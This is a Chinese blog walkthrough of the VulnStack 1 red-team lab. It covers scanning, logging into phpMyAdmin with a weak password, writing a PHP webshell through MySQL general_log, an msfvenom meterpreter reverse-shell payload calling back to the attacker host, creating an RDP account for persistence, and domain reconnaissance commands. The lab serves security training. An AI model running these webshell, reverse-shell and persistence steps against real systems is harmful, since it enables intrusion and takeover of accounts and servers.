VulnStack实战(一)超级实战

已于 2023-09-05 12:59:28 修改
阅读量715 收藏 3
点赞数 1
分类专栏: 网络安全 文章标签: web安全 安全 网络安全
于 2023-07-14 00:00:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51198941/article/details/131713835
版权

目录

一、靶场下载地址

二、描述

三、环境搭建

四、信息收集

1.探测靶机IP

2.端口扫描

3.目录扫描

4.指纹识别

五、漏洞探测

六、漏洞利用

七、后渗透

八、内网渗透

一、靶场下载地址

漏洞详情 (qiyuanxuetang.net)

二、描述

红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密码:hongrisec@2019:

三、环境搭建

共有三台机器,Win7是对外的web机,Win2003和Win2008(DC)是内网机器。

VM1(Win7)添加一块网卡,分别设置为:VMnet1(仅主机模式)、VMnet8(NAT模式)

VM2(Win2003)网卡设置为:VMnet1(仅主机模式)

VM2(Win2008)网卡设置为:VMnet1(仅主机模式)

Win7:192.168.52.143、192.168.22.133

win2003:192.168.52.141

Win2008:192.168.52.138

DNS服务器:192.168.52.138

攻击机kali:192.168.22.131

找到并打开phpstudy.exe,启动服务(若启动失败,重启Win7即可)

打开Firefox访问localhost,已确认服务启动

查看了一下,把敏感信息收集起来,比如网站根目录,开启的什么敏感文件,然后我们往下边翻的时候,发现有一个登录框,用常见的弱口令试了一下,发现root,root能登录 

四、信息收集

1.探测靶机IP

使用nmap对同一C段主机进行扫描:

nmap -sP 192.168.22.1/24

使用arp-scan对同网段主机进行扫描:

2.端口扫描

使用nmap对靶机进行全扫描(扫描前确保phpstudy的服务已成功启动):

nmap -Pn -A 192.168.22.133

发现开放的端口有80和3306

3.目录扫描

使用dirb对靶机进行目录扫描 :

dirb "http://192.168.202.132"

4.指纹识别

使用whatweb对靶机上的网站进行指纹识别:

whtaweb http://192.168.22.133

使用Nmap对靶机进行指纹识别

nmap -Pn -sV 192.168.22.133

指纹识别依托于目录爆破,没有扫描到关键的cms信息既可能是字典的问题,也可能是靶机上根本就没有部署这样的网站。

五、漏洞探测

从目录扫描中可以看到http://192.168.22.133/phpinfo.php是可以访问的,

因此访问http://192.168.22.133/phpifno.php:

phpinfo.php中存在许多关键信息,不过要具体漏洞具体分析。目录扫描中http://192.168.22.133/phpmyadmin是可以访问的,访问http://192.168.22.133/phpmyadmin: 

尝试用上方的弱口令密码登录

登录成功。

六、漏洞利用

一、phpmyadmin

登录phpmyadmin,查看用户权限:

show grants for root@localhost;

使用SQL语句查看是否有无权限

show variables like '%secure_file%';

secure_file_priv 值为 NULL 不能使用into 方法导入shell

我们尝试在日志写 shell ,使用SQL语句开启日志服务

set global general_log = "ON";

查看当前日志: 

show variables like 'general%';

修改日志路径

set global general_log_file="C:\\phpStudy\\WWW\\123.php";

再次查看是否修改成功

此时日志成功打开,并且内容会保存到网站根目录的123.php下

将一句话木马写如日志即可

select "<?php eval($_POST['cmd']);?>"

使用蚁剑连接

成功连接

七、后渗透

现在尝试使用kali自带的msf进行渗透,首先制作shell.exe木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.22.131 LPORT=8888 -f exe -o shell.exe

赋予权限

将shell.exe上传到WWW目录

建立msf连接 

 执行shell.exe并建立一个管理员账户test

 msf成功上线

开启远程桌面 

使用test用户连接远程桌面

连接成功,后续可以将这个账户设置为影子账户(详细可点击这里),以至于权限维持

八、内网渗透

尝试内网信息收集

ipconfig /all 查询本机IP段,所在域等

net config Workstation 当前计算机名,全名,用户名,系统版本,工作站域,登陆域

net user 本机用户列表

net localhroup administrators 本机管理员[通常含有域用户]

net user /domain 查询域用户

net user 用户名 /domain 获取指定用户的账户信息

net user /domain b404 pass 修改域内用户密码,需要管理员权限

net group /domain 查询域里面的工作组

net group 组名 /domain 查询域中的某工作组

net group "domain admins" /domain 查询域管理员列表

net group "domain controllers" /domain 查看域控制器(如果有多台)

net time /domain 判断主域,主域服务器都做时间服务器

之后我们在进行信息收集,为我们后渗透做准备

当前域名为god,登录用户是administrator,且存在两个网卡,分别是192.168.22.133(外网)和192.168.52.143(内网)

继续查看当前登录域及登录用户信息:

net config Workstation

 发现内网共有三台工作主机(包括自己)

本期VulnStack实战(一)先到这里,后续继续更新!!!

努力学习的阿发
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
内网渗透靶场 Vulnstack(二)
qq_47168481的博客
03-08 5690
这次靶场东拼西凑也算是通关了,重新复习了一下,也学到了很多东西,在这简单梳理一下思路 内网环境介绍 域控服务器: •内网IP:10.10.10.10 •系统:Windows Server 2012(64位) •用户名:de1ay WEB服务器: •模拟外网IP:192.168.178.153 •内网IP:10.10.10.80 •系统:Windows Server 2008(64位) PC域内主机: •内网IP:10.10.10.201 •系统:Windows 7(32位) 攻击者VPS: •模拟外网IP
Vulnstack(1)
ppbgi的博客
05-25 282
信息收集 进行ip的扫描以及开放端口的探测: 扫描到有80端口,进行访问: 尝试在phpstuday中能获得的信息,发现有输入框,尝试弱口令: 发现可以登录,进行目录后台的扫描: 发现有phpmyadmin目录,进行登录: 然后尝试写入一句话木马来获取shell: show variables like '%general%'; #查看日志状态 SET GLOBAL general_log='on' #开启general set global general
vulnstack内网靶场渗透测试
最新发布
three_1996的博客
03-19 635
【代码】vulnstack内网靶场渗透测试。
Vulnstack(一)
iO快到碗里来
11-12 9421
0x00 Preface 网上有很多关于 Vulnstack(一) 的优质文章,本篇文章仅用于记录笔者自身的学习过程。 0x01 环境准备 共有三台机器,Win7是对外的web机,win2003和win2008是内网机器。 VM1(Win7)添加一块网卡,分别设置为:VMnet1(仅主机模式)、VMnet8(NAT模式) VM2(Win2003)网卡设置为:VMnet1(仅主机模式) VM2(Win2008)网卡设置为:VMnet1(仅主机模式) 打开Win2003、Win2008,输入默认
[内网渗透]——VulnStack (一)
Sentiment的博客
04-21 1650
网络拓扑图 VMware 网络配置 虚拟网络名称 网段 DHCP VMnet3 192.168.72.0/24 是 VMnet4 192.168.52.0/24 是 虚拟机网络配置 虚拟机 网段 虚拟机接口 Windows 7 x64 192.168.72.0/24 192.168.52.0/24 VMnet3,VMnet4 Win2K3 Metasploitable 192.168.52.0/24 VMnet4 Windows Server 2008 R
复现红日安全-ATT& CK实战Vulnstack靶场实战(一)
weixin_51152373的博客
06-14 755
内网实战环境配置所有主机密码为:hongrisec@2019密码同一修改为:hongrisec@2021攻击机名称: win 10 | kali 2020vm1名称: win 7ip: 外网:192.168.154.0内网:192.168.52.143vm2名称: win 2003vm3名称: win 2008(域控)网络配置Win7服务开启。
内网渗透靶场 Vulnstack(一)
qq_47168481的博客
10-06 5248
虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,搞了好几天,学到了不少,继续努力!!! 域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 从 Windows Server 2003 开始 , Active Directory 是负责维护该中央数据库的 Windows
Skype安装程序
07-28
最新版Skype即时通讯工具。Skype即时通讯工具是国际上最流行的即时通讯工具,由俄罗斯人创造,现在被美国微软公司收购,已经替代了过去的MSN和ICQ,为当今世界最流行的语音通讯工具
vulnstack(一)
qq_63928796的博客
03-17 719
三台机器在同一内网中,win7 web服务开放在外网,只能通过拿下win7后将其作为跳板进行横向渗透,拿下win2008和win2003服务器。就可以了。
VulnStack靶场(一)
Lyaas的博客
06-02 1077
ATT&CK——VulnStack1红队(一)欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的
Vulnstack 红队(一)
菜鸟的学习笔记
06-02 8081
Vulnstack 红队(一) 靶机为红日安全分享的靶机 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 笔记参考资料如下: CSDN——谢公子 FreeBuf——红日安全团队专栏 CSDN——assless 序 本次网络环境为两个虚拟网络。 192.168.72.0/24为模拟公网环境。(Vmnet2) 192.168.52.0/24为模拟内网环境。(Vmnet1) 攻击者机器与win7的第一张网卡处于Vmnet1。(模拟公网) win7的
vulnstack系列靶场一
aming小老弟
06-09 2979
靶场
【红日靶场】vulnstack1-完整渗透过程
信安是不可或缺的一部分!
09-26 1022
大家有兴趣可以尝试获取,也可以通过网上披露的已知漏洞进行攻击,也可以做深入的代码审计方法很多,包括使用永痕之蓝漏洞,msf可以直接提到system权限,这里不在继续。没有识别到杀软,可以做msf上线或者做内网穿透或者冰蝎隧道(不推荐),看个人选择,也可以上线cs,做横向移动或者权限维持,这里我选择做简单的权限维持。因为版本很多已知漏洞无法使用有一些POC:https://www.exploit-db.com/exploits/25003。上传图片成功但是需要审核:这里就不能上传了,找一下后台登录点。
Vulnstack----1、ATT&CK红队评估实战靶场一
七天
08-01 1018
3、敏感目录:http://192.168.144.132/phpMyadmin。4、发现yxcms:http://192.168.144.132/yxcms。192.168.52.143:存在MS17-010。192.168.52.138:存在MS17-010。域用户:dev1、root-tvi862ubeh。win7内网ip:192.168.52.143。1、ip地址:192.168.144.132。内网ip地址:192.168.52.143。内网网段:192.168.52.0/24。
Vulnstack靶场实战(一)
weixin_46066840的博客
09-13 1451
红日安全实战Vulnstack靶场实战(一)
VulnStack1靶场笔记
weixin_45568454的博客
01-30 154
这是一个来自scripter的成长日记,我相信总有一天我会成为一个师傅哒。这篇博客是很早之前我打的第一个靶场,所以技术上还会有些不足~而且其中的部分技术引用了网络上其他大佬的文档
VulnStack靶场6
weixin_45568454的博客
11-04 193
打靶日记之VulnStack记录 记下了好多踩过的坑 以及一些小的心得体会
vulnstack(五)
干铮的博客
05-30 1118
1.信息收集 主机发现 sudo netdiscover eth0 -r 192.168.31.0/24 端口扫描 nmap -A 192.168.31.57 -p- -sV -oN nmap.a goby漏扫 2.漏洞利用 goby 通用poc写webshell echo ^<?php @eval($_POST['123']) ?^> > #注意”>“字符需要转义 type shell.php 蚁剑连接webshell 3.
用sqlmap跑sqli-labs靶场第一关
01-06
以下是使用sqlmap跑sqli-labs靶场第一关的步骤: 1. 下载并安装sqlmap工具。你可以从官方网站下载sqlmap工具并按照说明进行安装。 2. 打开终端或命令提示符,并导航到sqlmap的安装目录。 3. 运行以下命令来检测目标网站是否存在SQL注入漏洞: ```shell python sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --level=5 --risk=3 --dbs ``` 这个命令将使用sqlmap工具对目标网站进行扫描,并尝试发现数据库。 4. 如果目标网站存在SQL注入漏洞,sqlmap将返回数据库的名称。你可以使用以下命令来获取数据库的名称: ```shell python sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --level=5 --risk=3 --dbs --batch --dump ``` 这个命令将获取数据库的名称,并尝试获取数据库中的表和数据。 请注意,上述命令中的URL和参数可能需要根据你的实际情况进行修改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值